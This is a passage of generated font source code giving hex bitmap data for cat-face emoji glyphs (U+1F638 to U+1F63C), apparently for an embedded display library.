0x7, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x78, 0x0, 0x1,
0xe0, 0x0, 0x71, 0xc0, 0x0, 0x7e, 0x0, 0x1,
0xf8, 0x0, 0x3c, 0xe0, 0x0, 0x7f, 0x80, 0x1,
0xfe, 0x0, 0xe, 0x70, 0x0, 0x3f, 0xc0, 0x0,
0xff, 0x0, 0x7, 0x38, 0x0, 0x1f, 0xe0, 0x0,
0x7f, 0x80, 0x3, 0xb8, 0x0, 0xf, 0xf0, 0x0,
0x3f, 0xc0, 0x0, 0xfc, 0x0, 0x7, 0xf8, 0x0,
0x1f, 0xe0, 0x0, 0x7e, 0x0, 0x1, 0xf8, 0x0,
0x7, 0xe0, 0x0, 0x3f, 0x0, 0x0, 0x78, 0x0,
0x1, 0xe0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x3f,
0xfc, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x7, 0xff,
0xff, 0xf8, 0x0, 0x3, 0xf8, 0x0, 0x3f, 0xf0,
0x0, 0xff, 0xc0, 0x3, 0xff, 0x0, 0xff, 0x0,
0x0, 0x3, 0xfc, 0x7, 0xff, 0xf0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x1f, 0xfe, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xbf, 0xf, 0xf0, 0x0,
0x0, 0x0, 0x0, 0xfe, 0x3d, 0xc0, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x78, 0x1c, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x38, 0xe, 0x70, 0xe, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7, 0x38, 0x7, 0x0,
0x0, 0x0, 0x0, 0xe, 0x7, 0x8e, 0x3, 0x80,
0x0, 0x0, 0x0, 0x7, 0x3, 0x87, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x3, 0x81, 0xc1, 0xc0, 0xe0,
0x0, 0x0, 0x0, 0x1, 0xc1, 0xc0, 0xe0, 0x70,
0x0, 0x0, 0x0, 0x0, 0xe0, 0xe0, 0x78, 0x38,
0x0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x1c, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x38, 0x70, 0x7, 0x6,
0x0, 0x0, 0x0, 0x0, 0x38, 0x70, 0x3, 0xc3,
0x80, 0x0, 0x0, 0x0, 0x1c, 0x78, 0x0, 0xe3,
0xc0, 0x0, 0x0, 0x0, 0xf, 0x38, 0x0, 0x3f,
0xf8, 0x0, 0x0, 0x0, 0x1f, 0xf8, 0x0, 0x1f,
0x9f, 0x0, 0x0, 0x0, 0x3e, 0xf8, 0x0, 0x7,
0x87, 0xe0, 0x0, 0x0, 0x7e, 0x3c, 0x0, 0x1,
0xe0, 0xfc, 0x0, 0x0, 0xf8, 0x3c, 0x0, 0x0,
0x78, 0xf, 0xe0, 0x7, 0xf0, 0x3c, 0x0, 0x0,
0x1e, 0x1, 0xff, 0xff, 0xc0, 0x38, 0x0, 0x0,
0x3, 0xc0, 0xf, 0xfe, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F638 "😸" */
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x1, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0x60, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80, 0x30,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x80, 0x3, 0x80,
0x18, 0x0, 0x0, 0x0, 0x38, 0x1, 0x80, 0x7,
0x0, 0xc, 0x0, 0x0, 0x0, 0x70, 0x1, 0xc0,
0x7, 0x4, 0x6, 0x0, 0x0, 0x0, 0xe0, 0x41,
0xc0, 0x7, 0xe, 0x7, 0x0, 0x0, 0x1, 0xc0,
0xe1, 0xc0, 0x7, 0xf, 0x3, 0x87, 0xff, 0xc3,
0x81, 0xe1, 0xc0, 0x7, 0xf, 0x81, 0xff, 0xff,
0xff, 0x3, 0xe1, 0xc0, 0x7, 0xf, 0xc0, 0xff,
0xc7, 0xff, 0x7, 0xe1, 0xc0, 0x7, 0xf, 0xe0,
0xbf, 0xc7, 0xfa, 0xf, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0x1f, 0xc7, 0xf0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0xf, 0xc7, 0xe0, 0x7,
0xe1, 0xc0, 0x7, 0x7, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x7, 0x83,
0xc0, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x3,
0x83, 0xc0, 0x0, 0xc1, 0x80, 0x3, 0x84, 0x0,
0x0, 0x0, 0x0, 0x0, 0x43, 0x80, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x61, 0xc0, 0x7,
0xc0, 0x0, 0x7, 0xc0, 0x7, 0xc, 0xfd, 0xc0,
0x1f, 0xf0, 0x0, 0xf, 0xf0, 0x7, 0x3e, 0x3f,
0xc0, 0x3c, 0x78, 0x0, 0x3c, 0x78, 0x3, 0xf8,
0x7, 0xe0, 0x78, 0x3c, 0x0, 0x38, 0x1c, 0x7,
0xe0, 0x1, 0xf8, 0x30, 0x18, 0x0, 0x30, 0x1c,
0x3f, 0x80, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x80, 0x3, 0x90, 0x0, 0x0, 0x0,
0x0, 0x0, 0x13, 0x80, 0xf3, 0x80, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x3, 0x9e, 0xff, 0xe0, 0x0,
0x0, 0xfe, 0x0, 0x0, 0xf, 0xfe, 0xff, 0xf8,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3f, 0xfe, 0x1,
0xf8, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x3f, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x3,
0x80, 0x1, 0xc0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x7, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x7, 0x0, 0x1, 0xf8, 0x3, 0xe0, 0x7e,
0x7, 0x80, 0x3f, 0x0, 0x1, 0xf8, 0x7, 0xff,
0xff, 0xff, 0xc0, 0x3f, 0x0, 0x1f, 0xe0, 0xe,
0xff, 0xd7, 0xfe, 0xe0, 0xf, 0xf0, 0x7f, 0x60,
0xe, 0xc2, 0x10, 0xc6, 0xe0, 0xf, 0xfc, 0x78,
0x70, 0xe, 0xc2, 0x10, 0xc6, 0xe0, 0x1c, 0x3c,
0x0, 0x70, 0x7, 0xc2, 0x10, 0xc7, 0xe0, 0x1c,
0x0, 0x0, 0x38, 0x7, 0xc2, 0x10, 0xc7, 0xc0,
0x38, 0x0, 0x0, 0x1c, 0x3, 0xe2, 0x10, 0xcf,
0x80, 0x78, 0x0, 0x0, 0x1e, 0x1, 0xfe, 0x10,
0xff, 0x0, 0x70, 0x0, 0x0, 0xf, 0x0, 0x7f,
0xff, 0xfc, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x80,
0x1f, 0xff, 0xf0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0xfe, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F639 "😹" */
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x7f, 0x80, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x0, 0xe3, 0xc0, 0x0, 0x0, 0x0,
0x3, 0xe3, 0x0, 0x0, 0xc0, 0xe0, 0x0, 0x0,
0x0, 0x7, 0x81, 0x0, 0x1, 0xc0, 0x70, 0x0,
0x0, 0x0, 0xf, 0x1, 0x80, 0x1, 0xc0, 0x38,
0x0, 0x0, 0x0, 0x1e, 0x1, 0x80, 0x1, 0x80,
0x1c, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x80, 0x1,
0x80, 0xe, 0x0, 0x0, 0x0, 0x78, 0x0, 0xc0,
0x3, 0x82, 0x7, 0x0, 0x0, 0x0, 0xf0, 0x20,
0xc0, 0x3, 0x87, 0x3, 0x80, 0x0, 0x1, 0xe0,
0x70, 0xc0, 0x3, 0x87, 0x81, 0x83, 0xff, 0xc1,
0xc0, 0xf0, 0xc0, 0x3, 0x87, 0xc0, 0xff, 0xff,
0xff, 0x81, 0xf0, 0xc0, 0x3, 0x87, 0xe0, 0xff,
0xe3, 0xff, 0x83, 0xf0, 0xc0, 0x3, 0x87, 0xf0,
0x5f, 0xe3, 0xfd, 0x7, 0xf0, 0xc0, 0x3, 0x87,
0xf0, 0xf, 0xe3, 0xf8, 0x7, 0xf0, 0xc0, 0x3,
0x87, 0xf8, 0xf, 0xe3, 0xf8, 0xf, 0xf0, 0xc0,
0x3, 0x87, 0xf0, 0xf, 0xe3, 0xf8, 0x7, 0xf0,
0xc0, 0x3, 0x87, 0xe0, 0x7, 0xe3, 0xf0, 0x3,
0xf0, 0xc0, 0x3, 0x83, 0xc0, 0x7, 0xe3, 0xf0,
0x1, 0xe0, 0xc0, 0x1, 0x83, 0x80, 0x3, 0xc1,
0xe0, 0x0, 0xe0, 0xc0, 0x1, 0x83, 0x0, 0x1,
0xc1, 0xe0, 0x0, 0x60, 0xc0, 0x1, 0xc2, 0x0,
0x0, 0x0, 0x0, 0x0, 0x21, 0x80, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x80,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0x80, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x30, 0xe0, 0x3,
0xe0, 0x0, 0x3, 0xe0, 0x3, 0x8c, 0x7c, 0xe0,
0xf, 0xf8, 0x0, 0x7, 0xf8, 0x3, 0xbe, 0x1f,
0xc0, 0x1e, 0x3c, 0x0, 0x1e, 0x3c, 0x1, 0xf8,
0x7, 0xe0, 0x3c, 0x1e, 0x0, 0x1c, 0xe, 0x7,
0xe0, 0x1, 0xfc, 0x18, 0xc, 0x0, 0x18, 0xe,
0x1f, 0xc0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xc0, 0x1, 0xc8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x9, 0xc0, 0x79, 0xc0, 0x0, 0x0,
0x3e, 0x0, 0x0, 0x1, 0xce, 0x7f, 0xcf, 0xf0,
0x0, 0x7f, 0x0, 0x7, 0xf1, 0xfe, 0x7f, 0xff,
0xf0, 0x0, 0x7f, 0x0, 0x7, 0xff, 0xfe, 0x1,
0xfe, 0x60, 0x0, 0x3f, 0x0, 0x3, 0x3f, 0xc0,
0x3, 0xf0, 0xe0, 0x0, 0x1e, 0x0, 0x3, 0x87,
0xc0, 0x7, 0xc0, 0xe0, 0x0, 0x1e, 0x0, 0x3,
0x81, 0xe0, 0xf, 0x0, 0xc0, 0x0, 0x3e, 0x0,
0x1, 0x80, 0xf0, 0xe, 0x0, 0xc1, 0xf0, 0x3f,
0x3, 0xc1, 0x80, 0x70, 0x1e, 0x1, 0xc3, 0xff,
0xff, 0xff, 0xe1, 0x80, 0x78, 0x1c, 0x1, 0xc7,
0x7f, 0xeb, 0xff, 0x71, 0xc0, 0x38, 0x1c, 0x1,
0x87, 0x61, 0x8, 0x63, 0x70, 0xc0, 0x38, 0x1c,
0x3, 0x87, 0x61, 0x8, 0x63, 0x70, 0xc0, 0x38,
0x1c, 0x3, 0x83, 0xe1, 0x8, 0x63, 0xe0, 0xe0,
0x38, 0xe, 0x7, 0x3, 0xe1, 0x8, 0x63, 0xe0,
0x60, 0x70, 0xf, 0xe, 0x1, 0xf1, 0x8, 0x67,
0xc0, 0x70, 0xf0, 0x7, 0xff, 0x0, 0x7f, 0x8,
0x7f, 0x80, 0x7f, 0xe0, 0x1, 0xfb, 0x80, 0x3f,
0xff, 0xfe, 0x0, 0xef, 0xc0, 0x0, 0x1, 0xc0,
0x7, 0xff, 0xf0, 0x1, 0xc0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x78, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x1e, 0x0,
0x0, 0x0, 0x0, 0xf, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x0,
0x3f, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xff, 0xe0, 0x0, 0x0, 0x0,
/* U+1F63A "😺" */
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x1, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0x60, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80, 0x30,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x80, 0x3, 0x80,
0x18, 0x0, 0x0, 0x0, 0x38, 0x1, 0x80, 0x7,
0x0, 0xc, 0x0, 0x0, 0x0, 0x70, 0x1, 0xc0,
0x7, 0x4, 0x6, 0x0, 0x0, 0x0, 0xe0, 0x41,
0xc0, 0x7, 0xe, 0x7, 0x0, 0x0, 0x1, 0xc0,
0xe1, 0xc0, 0x7, 0xf, 0x3, 0x87, 0xff, 0xc3,
0x81, 0xe1, 0xc0, 0x7, 0xf, 0x81, 0xff, 0xff,
0xff, 0x3, 0xe1, 0xc0, 0x7, 0xf, 0xc0, 0xff,
0xc7, 0xff, 0x7, 0xe1, 0xc0, 0x7, 0xf, 0xe0,
0xbf, 0xc7, 0xfa, 0xf, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0x1f, 0xc7, 0xf0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0xf, 0xc7, 0xe0, 0x7,
0xe1, 0xc0, 0x7, 0xf, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x7, 0x83,
0xc0, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x7,
0x83, 0xc0, 0x0, 0xc1, 0x80, 0x3, 0x84, 0x0,
0x1, 0x1, 0x0, 0x0, 0x43, 0x80, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x1,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xc0, 0x3, 0x80,
0x0, 0x3, 0x80, 0x7, 0x0, 0x1, 0xc0, 0x7,
0xc0, 0x0, 0x7, 0xc0, 0x7, 0x0, 0x1, 0xc0,
0x7, 0xe0, 0x0, 0xf, 0xc0, 0x7, 0x0, 0x1,
0xc0, 0xf, 0xe0, 0x0, 0xf, 0xe0, 0x3, 0x80,
0x81, 0x80, 0xf, 0xe0, 0x0, 0xf, 0xe0, 0x3,
0x82, 0xff, 0xe0, 0x7, 0xe0, 0x0, 0xf, 0xc0,
0x7, 0xfe, 0xff, 0xf8, 0x7, 0xc0, 0x0, 0x7,
0xc0, 0x3f, 0xfe, 0x3, 0xf8, 0x3, 0x80, 0x0,
0x3, 0x80, 0x3f, 0x80, 0x3, 0x80, 0x0, 0x0,
0x10, 0x0, 0x0, 0x3, 0x80, 0x3, 0x80, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0x1, 0x80,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0xf,
0xfc, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x7f, 0xe0,
0xff, 0xfc, 0x0, 0x0, 0x38, 0x0, 0x0, 0x7f,
0xfe, 0xf9, 0xc0, 0x0, 0x0, 0x38, 0x2, 0x0,
0x7, 0x3e, 0x41, 0xc0, 0x0, 0xc0, 0x7e, 0x6,
0x0, 0x7, 0x2, 0x1, 0xc0, 0x1, 0xff, 0xef,
0xff, 0x0, 0x7, 0x0, 0x0, 0xc0, 0x0, 0xff,
0xc7, 0xfe, 0x0, 0x7, 0x0, 0x0, 0xef, 0x0,
0x3f, 0x1, 0xf8, 0x1, 0xee, 0x0, 0x0, 0xff,
0x0, 0xe, 0x0, 0xe0, 0x1, 0xfe, 0x0, 0x1,
0xf0, 0x0, 0x7, 0x1, 0xc0, 0x0, 0x1f, 0x80,
0x7, 0xf0, 0x0, 0x3, 0x83, 0x80, 0x0, 0x1f,
0xc0, 0xf, 0x38, 0x0, 0x1, 0xff, 0x0, 0x0,
0x39, 0xf0, 0x1c, 0x1c, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x78, 0x70, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x20, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F63B "😻" */
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x1, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0x60, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80, 0x30,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x80, 0x3, 0x80,
0x18, 0x0, 0x0, 0x0, 0x38, 0x1, 0x80, 0x7,
0x0, 0xc, 0x0, 0x0, 0x0, 0x70, 0x1, 0xc0,
0x7, 0x4, 0x6, 0x0, 0x0, 0x0, 0xe0, 0x41,
0xc0, 0x7, 0xe, 0x7, 0x0, 0x0, 0x1, 0xc0,
0xe1, 0xc0, 0x7, 0xf, 0x3, 0x87, 0xff, 0xc3,
0x81, 0xe1, 0xc0, 0x7, 0xf, 0x81, 0xff, 0xff,
0xff, 0x3, 0xe1, 0xc0, 0x7, 0xf, 0xc0, 0xff,
0xc7, 0xff, 0x7, 0xe1, 0xc0, 0x7, 0xf, 0xe0,
0x9f, 0xc7, 0xf2, 0xf, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0xf, 0xc7, 0xe0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0xf, 0xc7, 0xe0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0x7, 0xc7, 0xc0, 0x7,
0xe1, 0xc0, 0x7, 0xf, 0x80, 0x7, 0x83, 0xc0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x3, 0x83,
0x80, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc3, 0x80, 0x3, 0x84, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x43, 0x80, 0x3, 0x80,
0x1, 0xf8, 0x0, 0x3f, 0x0, 0x3, 0x80, 0x1,
0xc0, 0x7b, 0xfc, 0x0, 0x7f, 0xbc, 0x3, 0x80,
0x1, 0xc1, 0xff, 0xfe, 0x0, 0xff, 0xff, 0x7,
0x0, 0x1, 0xc1, 0xff, 0xfe, 0x0, 0xff, 0xff,
0x7, 0x0, 0x0, 0xc3, 0xff, 0xfe, 0x0, 0xff,
0xff, 0x87, 0x0, 0x0, 0xe3, 0xff, 0xfe, 0x0,
0xff, 0xff, 0x86, 0x0, 0x0, 0xc3, 0xff, 0xfe,
0x0, 0xff, 0xff, 0x87, 0x0, 0x1, 0xc3, 0xff,
0xfe, 0x0, 0xff, 0xff, 0x87, 0x0, 0x1, 0xc1,
0xff, 0xfc, 0x0, 0x7f, 0xff, 0x7, 0x0, 0x1,
0xc1, 0xff, 0xfc, 0x0, 0x7f, 0xff, 0x3, 0x80,
0x1, 0x80, 0xff, 0xf8, 0x0, 0x3f, 0xfe, 0x3,
0x80, 0xff, 0x80, 0x7f, 0xf8, 0x0, 0x3f, 0xfc,
0x3, 0xfe, 0xff, 0xf8, 0x3f, 0xf0, 0x0, 0x1f,
0xf8, 0x3f, 0xfe, 0x3, 0xf8, 0x1f, 0xe0, 0x0,
0xf, 0xf0, 0x3f, 0x80, 0x3, 0x80, 0x3, 0xc0,
0x38, 0x7, 0x80, 0x3, 0x80, 0x3, 0x80, 0x0,
0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0x1, 0x80,
0x0, 0x0, 0xfe, 0x0, 0x0, 0x3, 0x80, 0x1,
0x80, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x3, 0x80,
0xf, 0xfc, 0x0, 0x0, 0x38, 0x0, 0x0, 0x7f,
0xe0, 0xff, 0xfc, 0x0, 0x0, 0x78, 0x0, 0x0,
0x7f, 0xfe, 0xf9, 0xc0, 0x0, 0xe0, 0xfe, 0xe,
0x0, 0x7, 0x3e, 0x41, 0xc0, 0x0, 0xff, 0xef,
0xfe, 0x0, 0x7, 0x2, 0x0, 0xe0, 0x0, 0x7f,
0x83, 0xfc, 0x0, 0x7, 0x0, 0x0, 0xef, 0x0,
0xc, 0x0, 0xe0, 0x1, 0xee, 0x0, 0x0, 0x7f,
0x0, 0xe, 0x0, 0xe0, 0x1, 0xfe, 0x0, 0x1,
0xf8, 0x0, 0x7, 0x1, 0xc0, 0x0, 0x1f, 0x0,
0x3, 0xf0, 0x0, 0x3, 0x83, 0x80, 0x0, 0x1f,
0xc0, 0xf, 0xb8, 0x0, 0x1, 0xff, 0x0, 0x0,
0x39, 0xe0, 0x1e, 0x1c, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x78, 0xf0, 0xc, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x70, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x3,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x3f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xc0, 0x0, 0x0, 0x0,
/* U+1F63C "😼" */
0x0, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xfe, 0x0, 0x1, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x3, 0xc7, 0x0, 0x1, 0xc1, 0xc0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x0, 0x3, 0x80, 0x60, 0x0,
0x0, 0x0, 0xe, 0x3, 0x80, 0x3, 0x80, 0x30,
0x0, 0x0, 0x0, 0x1c, 0x3, 0x80, 0x3, 0x80,
0x18, 0x0, 0x0, 0x0, 0x38, 0x1, 0x80, 0x7,
0x0, 0xc, 0x0, 0x0, 0x0, 0x70, 0x1, 0xc0,
0x7, 0x4, 0x6, 0x0, 0x0, 0x0, 0xe0, 0x41,
0xc0, 0x7, 0xe, 0x7, 0x0, 0x0, 0x1, 0xc0,
0xe1, 0xc0, 0x7, 0xf, 0x3, 0x87, 0xff, 0xc3,
0x81, 0xe1, 0xc0, 0x7, 0xf, 0x81, 0xff, 0xff,
0xff, 0x3, 0xe1, 0xc0, 0x7, 0xf, 0xc0, 0xff,
0xc7, 0xff, 0x7, 0xe1, 0xc0, 0x7, 0xf, 0xe0,
0xbf, 0xc7, 0xfa, 0xf, 0xe1, 0xc0, 0x7, 0xf,
0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1, 0xc0, 0x7,
0xf, 0xf0, 0x1f, 0xc7, 0xf0, 0x1f, 0xe1, 0xc0,
0x7, 0xf, 0xe0, 0x1f, 0xc7, 0xf0, 0xf, 0xe1,
0xc0, 0x7, 0xf, 0xc0, 0xf, 0xc7, 0xe0, 0x7,
0xe1, 0xc0, 0x7, 0x7, 0x80, 0xf, 0xc7, 0xe0,
0x3, 0xc1, 0xc0, 0x3, 0x87, 0x0, 0x7, 0x83,
0xc0, 0x1, 0xc1, 0xc0, 0x3, 0x86, 0x0, 0x3,
